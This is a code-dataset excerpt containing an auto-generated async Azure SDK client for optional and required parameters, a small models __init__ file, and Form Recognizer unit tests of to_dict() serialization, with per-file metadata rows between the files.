@distributed_trace_async
async def post_optional_class_property(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
"""Test explicitly optional complex object. Please put a valid class-wrapper with 'value' = null.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"value": {
"id": 0, # Required.
"name": "str" # Optional.
}
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_explicit_post_optional_class_property_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_class_property.metadata = {"url": "/reqopt/optional/class/property"} # type: ignore
@distributed_trace_async
async def post_required_array_parameter(self, body_parameter: List[str], **kwargs: Any) -> None:
"""Test explicitly required array. Please put null and the client library should throw before the
request is sent.
:param body_parameter:
:type body_parameter: list[str]
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = [
"str" # Optional.
]
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = body_parameter
request = build_explicit_post_required_array_parameter_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_array_parameter.metadata = {"url": "/reqopt/requied/array/parameter"} # type: ignore
@distributed_trace_async
async def post_optional_array_parameter(self, body_parameter: Optional[List[str]] = None, **kwargs: Any) -> None:
"""Test explicitly optional array. Please put null.
:param body_parameter:
:type body_parameter: list[str]
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = [
"str" # Optional.
]
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_explicit_post_optional_array_parameter_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_array_parameter.metadata = {"url": "/reqopt/optional/array/parameter"} # type: ignore
@distributed_trace_async
async def post_required_array_property(self, body_parameter: JSONType, **kwargs: Any) -> None:
"""Test explicitly required array. Please put a valid array-wrapper with 'value' = null and the
client library should throw before the request is sent.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"value": [
"str" # Required.
]
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = body_parameter
request = build_explicit_post_required_array_property_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_array_property.metadata = {"url": "/reqopt/requied/array/property"} # type: ignore
@distributed_trace_async
async def post_optional_array_property(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
"""Test explicitly optional array. Please put a valid array-wrapper with 'value' = null.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"value": [
"str" # Optional.
]
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_explicit_post_optional_array_property_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_array_property.metadata = {"url": "/reqopt/optional/array/property"} # type: ignore
@distributed_trace_async
async def post_required_array_header(self, *, header_parameter: List[str], **kwargs: Any) -> None:
"""Test explicitly required array. Please put a header 'headerParameter' => null and the client
library should throw before the request is sent.
:keyword header_parameter:
:paramtype header_parameter: list[str]
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_explicit_post_required_array_header_request(
header_parameter=header_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_array_header.metadata = {"url": "/reqopt/requied/array/header"} # type: ignore
@distributed_trace_async
async def post_optional_array_header(self, *, header_parameter: Optional[List[str]] = None, **kwargs: Any) -> None:
"""Test explicitly optional integer. Please put a header 'headerParameter' => null.
:keyword header_parameter:
:paramtype header_parameter: list[str]
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_explicit_post_optional_array_header_request(
header_parameter=header_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_array_header.metadata = {"url": "/reqopt/optional/array/header"} # type: ignore
| 40.383634
| 119
| 0.662732
| 5,866
| 53,791
| 5.825094
| 0.033583
| 0.03746
| 0.033714
| 0.030202
| 0.962365
| 0.93266
| 0.926368
| 0.918086
| 0.879982
| 0.866725
| 0
| 0.009596
| 0.242531
| 53,791
| 1,331
| 120
| 40.413974
| 0.829034
| 0.049767
| 0
| 0.73487
| 0
| 0
| 0.053828
| 0.028484
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002882
| false
| 0
| 0.012968
| 0
| 0.064842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa22b65ffc3d23b926aefe1ec6335173c8489bfb
| 400
|
py
|
Python
|
gleague/gleague/models/__init__.py
|
Nuqlear/genkstaleague
|
664ed1d3ebea9c43053546fc2d658083cc16526b
|
[
"MIT"
] | 7
|
2015-08-18T01:21:48.000Z
|
2021-04-30T03:10:38.000Z
|
gleague/gleague/models/__init__.py
|
Nuqlear/genkstaleague
|
664ed1d3ebea9c43053546fc2d658083cc16526b
|
[
"MIT"
] | 1
|
2019-04-28T10:02:39.000Z
|
2019-05-06T08:11:56.000Z
|
gleague/gleague/models/__init__.py
|
Nuqlear/genkstaleague
|
664ed1d3ebea9c43053546fc2d658083cc16526b
|
[
"MIT"
] | 3
|
2015-08-14T09:42:25.000Z
|
2018-11-08T07:07:58.000Z
|
from gleague.models.player import Player
from gleague.models.season import Season
from gleague.models.season import SeasonStats
from gleague.models.match import Match
from gleague.models.match import Role
from gleague.models.match import CMPicksBans
from gleague.models.match import PlayerMatchItem
from gleague.models.match import PlayerMatchStats
from gleague.models.match import PlayerMatchRating
| 40
| 50
| 0.865
| 54
| 400
| 6.407407
| 0.240741
| 0.286127
| 0.442197
| 0.381503
| 0.653179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09
| 400
| 9
| 51
| 44.444444
| 0.950549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fa46c16dad7c0e4298fb108fc6fc3abc8c2938b6
| 37,919
|
py
|
Python
|
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from datetime import datetime
from azure.ai.formrecognizer import _models
from testcase import FormRecognizerTest
class TestToDict(FormRecognizerTest):
def test_point_to_dict(self):
model = [_models.Point(1, 2), _models.Point(3, 4)]
d = [p.to_dict() for p in model]
final = [
{"x": 1, "y": 2},
{
"x": 3,
"y": 4,
},
]
assert d == final
def test_form_word_to_dict(self):
form_word = _models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_word.to_dict()
final = {
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
assert d == final
def test_form_line_to_dict(self):
form_line = _models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
)
d = form_line.to_dict()
final = {
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}
assert d == final
def test_form_selection_mark_to_dict(self):
form_selection_mark = _models.FormSelectionMark(
text="checkbox",
state="selected",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_selection_mark.to_dict()
final = {
"text": "checkbox",
"state": "selected",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "selectionMark",
}
assert d == final
def test_form_element_to_dict(self):
form_element = _models.FormElement(
kind="selectionMark",
text="element",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_element.to_dict()
final = {
"text": "element",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"kind": "selectionMark",
}
assert d == final
def test_text_appearance_to_dict(self):
model = _models.TextAppearance(
style_name="other", style_confidence=0.98
)
d = model.to_dict()
final = {"style_name": "other", "style_confidence": 0.98}
assert d == final
def test_field_data_to_dict(self):
model = _models.FieldData(
text="element",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
)
d = model.to_dict()
final = {
"text": "element",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
}
assert d == final
def test_form_field_to_dict(self):
form_field = _models.FormField(
value_type="phoneNumber",
label_data=_models.FieldData(
text="phone",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
value_data=_models.FieldData(
text="55554444",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
name="phone",
value="55554444",
confidence=0.99,
)
d = form_field.to_dict()
final = {
"value_type": "phoneNumber",
"label_data": {
"text": "phone",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"value_data": {
"text": "55554444",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"name": "phone",
"value": "55554444",
"confidence": 0.99,
}
assert d == final
def test_recognized_form_to_dict(self):
form = _models.RecognizedForm(
form_type="test_form",
form_type_confidence="0.84",
model_id="examplemodel123",
page_range=_models.FormPageRange(1, 1),
fields={
"example": _models.FormField(
value_type="phoneNumber",
label_data=_models.FieldData(
text="phone",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
value_data=_models.FieldData(
text="55554444",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
name="phone",
value="55554444",
confidence=0.99,
)
},
pages=[_models.FormPage(
page_number=1,
text_angle=180.0,
width=5.5,
height=8.0,
unit="pixel",
lines=[_models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
)],
)
]
)
d = form.to_dict()
final = {
"form_type": "test_form",
"form_type_confidence": "0.84",
"model_id": "examplemodel123",
"page_range": {"first_page_number": 1, "last_page_number": 1},
"fields": {
"example": {
"value_type": "phoneNumber",
"label_data": {
"text": "phone",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"value_data": {
"text": "55554444",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"name": "phone",
"value": "55554444",
"confidence": 0.99,
}
},
"pages": [{
"page_number": 1,
"text_angle": 180.0,
"width": 5.5,
"height": 8.0,
"unit": "pixel",
"lines": [{
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}],
"selection_marks": [],
"tables": [],
}],
}
assert d == final
def test_form_page_to_dict(self):
form_page = _models.FormPage(
page_number=1,
text_angle=180.0,
width=5.5,
height=8.0,
unit="pixel",
tables= [
_models.FormTable(
page_number=2,
cells=[
_models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
],
row_count=10,
column_count=5,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
lines=[_models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
),
],
selection_marks=[_models.FormSelectionMark(
text="checkbox",
state="selected",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
)
d = form_page.to_dict()
final = {
"page_number": 1,
"text_angle": 180.0,
"width": 5.5,
"height": 8.0,
"unit": "pixel",
"tables": [
{"cells": [
{
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
},
],
"page_number": 2,
"row_count": 10,
"column_count": 5,
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
},
],
"lines": [{
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}],
"selection_marks": [{
"text": "checkbox",
"state": "selected",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "selectionMark",
}],
}
assert d == final
def test_form_table_cell_to_dict(self):
table_cell = _models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
d = table_cell.to_dict()
final = {
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
}
assert d == final
def test_form_table_to_dict(self):
table = _models.FormTable(
page_number=2,
cells=[
_models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
],
row_count=10,
column_count=5,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = table.to_dict()
final = {
"cells": [
{
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
},
],
"page_number": 2,
"row_count": 10,
"column_count": 5,
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
}
assert d == final
def test_custom_form_model_properties_to_dict(self):
model = _models.CustomFormModelProperties(
is_composed_model=True,
)
d = model.to_dict()
final = {
"is_composed_model": True,
}
assert d == final
def test_account_properties_to_dict(self):
model = _models.AccountProperties(
custom_model_count=5,
custom_model_limit=10,
)
d = model.to_dict()
final = {
"custom_model_count": 5,
"custom_model_limit": 10,
}
assert d == final
def test_custom_form_model_info_to_dict(self):
model = _models.CustomFormModelInfo(
model_id="1234",
status="creating",
training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
model_name="sample_model",
properties=_models.CustomFormModelProperties(
is_composed_model=False,
)
)
d = model.to_dict()
final = {
"model_id": "1234",
"status": "creating",
"training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"model_name": "sample_model",
"properties": {
"is_composed_model": False,
}
}
assert d == final
def test_form_recognizer_error_to_dict(self):
model = _models.FormRecognizerError(
code=404,
message="error not found",
)
d = model.to_dict()
final = {
"code": 404,
"message": "error not found",
}
assert d == final
def test_training_document_info_to_dict(self):
model = _models.TrainingDocumentInfo(
name="sample doc",
status="succeeded",
page_count=3,
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
model_id="1234",
)
d = model.to_dict()
final = {
"name": "sample doc",
"status": "succeeded",
"page_count": 3,
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"model_id": "1234",
}
assert d == final
def test_custom_form_model_field_to_dict(self):
model = _models.CustomFormModelField(
label="field_label",
name="field",
accuracy=0.98,
)
d = model.to_dict()
final = {
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
assert d == final
def test_custom_form_submodel_to_dict(self):
model = _models.CustomFormSubmodel(
model_id="1234",
form_type="submodel",
accuracy=0.98,
fields={
"example": _models.CustomFormModelField(
label="field_label",
name="field",
